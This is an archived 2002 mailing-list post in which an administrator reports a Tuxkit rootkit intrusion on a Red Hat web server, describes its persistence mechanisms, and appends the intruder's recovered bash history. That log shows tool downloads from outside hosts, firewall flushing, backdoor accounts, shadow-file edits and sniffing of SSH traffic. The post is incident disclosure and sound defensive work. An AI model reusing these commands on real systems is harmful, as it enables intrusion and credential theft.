Tuxkit (Optic Kit?) -cracked (/dev/tux)

From: Mark Newby (markat_private)
Date: Thu May 02 2002 - 03:54:25 PDT

  • Next message: William N. Zanatta: "Re: A friend's cable modem Linux machine just got compromised" 

    A client's web server (Red Hat Linux 7.2) got cracked into v recently.

I have re-created a mini filesystem of all the files the
rootkit/crackers modified/installed on another system.  the main culprit
was the dir /dev/tux, modified binaries installed, password-less users
added, tools downloaded, network sniffed, etc, etc.

one of the interesting things it does is install a rogue SSH2 server in
/usr/bin/ssh2d that runs on a high numbered port and modifies
/etc/rc.d/init.d/network to start it whenever the network service goes
up.  it also modifies /etc/rc.d/rc.sysinit to start /usr/bin/xsf and
/usr/bin/xchk, which it installs.

$ cat /dev/tux/ssh2/logo
________          __  .__          ____  __.__  __
\_____  \ _______/  |_|__| ____   |    |/ _|__|/  |_
   /   |   \\____ \   __\  |/ ___\  |      < |  \   __\
/    |    \  |_> >  | |  \  \___  |    |  \|  ||  |
\_______  /   __/|__| |__|\___  > |____|__ \__||__|
          \/|__|                \/          \/

               Only For Da T.R.U O.C's

---------- end of cat command o/p ----------

...anything to do w/ Mark Adene (aka `Phiber Optic'), I wonder?

The files installed by the rootkit/crackers match a very detailed review
of a rootkit called "Tuxkit" at the URL
<http://www.hackinthebox.org/article.php?sid=5724>, also available at
the URL <http://mel.ini2.net/p/tuxkit-analysis.txt> (which even advises
on how to improve it).

At least one of the crackers who got in didn't know how to turn off his
command history recording mechanism in bash, so I have a log of some of
the commands during two of his logins (see footer of this e-mail).

This is the first time posting to this site.  pls advise if this e-mail
could be improved upon.

I've written to Nelson, an author of chkrootkit to offer any data/files
so as this rootkit can be added for checking.  If anyone else would like
any of the files, just ask.


mark (command history of cracker follows)

------------------------------------
export DISPLAY=c4zz1mb0cch10
telnet localhost
lynx
cd /var/www
ls
cd html
ls
cd /var/spool
ls -la
cd wu-ftpd-trojan
ls
make install
make
cd ..
ls
rm -rf wu-ftpd-trojan
ls -la
rm .wu.tar.gz
ls
cd samba
mkdir .tmp
cd .tmp
ls -la
wget ftp://ftp.eggheads.org/pub/eggdrop/source/1.6/eggdrop1.6.10.tar.gz
ls -la
export DISPLAY=c4zz1mb0cch10
telnet localhost
ls
ipchains
/sbin/ipchains
/sbin/ipchains -L
/sbin/iptables --help
/sbin/iptables --L
/sbin/iptables -L
/sbin/iptables -F
/sbin/ifconfig
netstat -na
cd /var/log
ls -la
cat xferlog
cd /lib/security/.config
ls
ls -la
cat .logs
./lpsched
cd ssh
ls
cd ..
dmesg |more
cd /home
ls
cd amartin
ls -la
cd ..
cd scripts
ls -la
cd ..
tspreckley
cd tspreckley
ls
cd ..
mhill
ls
cd mhill
ls -la
cd ..
ls -la
cd mnewby
ls -la
cd ..
ls -la
cd nhoskins
ls -la
cd ..
ls -la
cd ..
ls -la
cd /root
ls -la
cat .saves-2169-www.kenmare.co.uk~
cat rootat_private
ÿü2ÿôÿý
ÿôÿýÿüóÿü;ÿü·ÿþìÿüðÿüÿü:ÿü
export DISPLAY=c4zz1mb0cch10
telnet localhost
ssh -p 15000 localhost
/sbin/ifconfig
ftp 62.98.168.235
ls -la
export DISPLAY=c4zz1mb0cch10
telnet localhost
ls -la
/sbin/route
/sbin/ifconfig
host keeper-dmz.kenmare.co.uk
nmap
telnet 192.168.66.111 21
ÿôÿý
route
/sbin/route
ping keeper-dmz.kenmare.co.uk
host gw
/sbin/route
host dmz
cat /etc/hosts
ps aux
kill -9 14576
finger
cd /home
ls
adduser tmp
/bin/adduser
/sbin/adduser
/usr/sbin/adduser
/usr/sbin/adduser tmp
passwd tmp
cat /etc/passwd
ls
exit
export DISPLAY=c4zz1mb0cch10
telnet locahost
ls -la
telnet localhost
exit
ls
lynx www.google.it
wget linux.minerva-is.cz/.tmp/.eg.tar.gz
mv .eg.tar.gz /var/spool
ls -la
cd lib
ls
mkdir .tmp
cd .tmp
mv /var/spool/.eg.tar.gz .eg.tar.gz
tar xvzf .eg.tar.gz
cd eggdrop1.6.10
cd ..
rm -rf .eg.tar.gz
rm -rf eggdrop1.6.10/
wget http://www.eggdrops.de/download/eggdrop1.6.1+IPv6+precompiled.tar.gz
tar xvzf eggdrop1.6.1+IPv6+precompiled.tar.gz
eg *.tar.gz
mv eggdrop1.6.1+IPv6_by_Akke/ .eg
rm eggdrop1.6.1+IPv6+precompiled.tar.gz
cd .eg
ls
rm eggdrop
ls
mv eggdrop-1.6.1 v0m3r0
rm *.conf
vi nnc
./v0m3r0 nnc -m
telnet localhost 3333
cd ..
ls
ls -la
ps aux
deluser tmp
rmuser
cd /home
ls
rm -rf tmp
vi /etc/passwd
vi /etc/passwd-
vi /etc/shadow
iptables -L
/sbin/iptables -L
exit
ls -la
cd /var/spool
ls -la
cd /lib
ls -la
cd .tmp
ls -la
cd .eg
ls -la
netstat -na
ÿôÿý
ÿôÿý
ÿôÿýÿôÿýÿôÿýÿôÿýÿôÿýÿôÿýexit
export DISPLAY=c4zz1mb0cch10
telnet localhost
adduser cos
/usr/bin/adduser
/usr/sbin/adduser
/usr/sbin/adduser cos
passwd cos
exit
ifconfig
/sbin/ifconfig
cd /lib/security/.config
ls -la
find / -name tcp.log
lynx
ls
wget
ftp 62.98.245.54
export DISPLAY=c4zz1mb0cch10
telnet localhost
lynx
tar xvzf sniffit.0.3.5.tar.gz
finger
cd sniffit.0.3.5
ls -la
./configure
make
ls -la
cd ..
mv sniffit.0.3.5 /var/spool/.tmp
rm sniffit.0.3.5.tar.gz
cd /var/spool/.tmp
ls
cd .tmp
ls -la
cd ..
ls -la
cd .tmp
ls -la
./sniffit
./sniffit -P tcp -p 22
/sbin/ifconfig
./sniffit -P tcp -p 22 -s 192.168.66.1
./sniffit -P tcp -p 22 -s 192.168.66.1  -L 10
vi README.FIRST
./sniffit -P tcp -p 22,21 -s 192.168.66.1  -L 1 -F eth0
./sniffit -P tcp -p 22 -s 192.168.66.1  -L 1 -F eth0
./sniffit -P tcp -p 22 -s 192.168.66.1  -L 1
./sniffit -P tcp -p 22 -L 1 -s 192.168.66.1
./sniffit -P tcp -p 22 -s 192.168.66.1
mv sniffit v0m3r0
ls
vi sample_config_file
cd ..
cd .tmp
rm -rf *
lynx
gcc -o v0m3r0 linsniffer.c
ls -la
cd /home
rm -rf cos
exit
-------------------------------------------



----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

    This archive was generated by hypermail 2b30 : Thu May 02 2002 - 08:21:56 PDT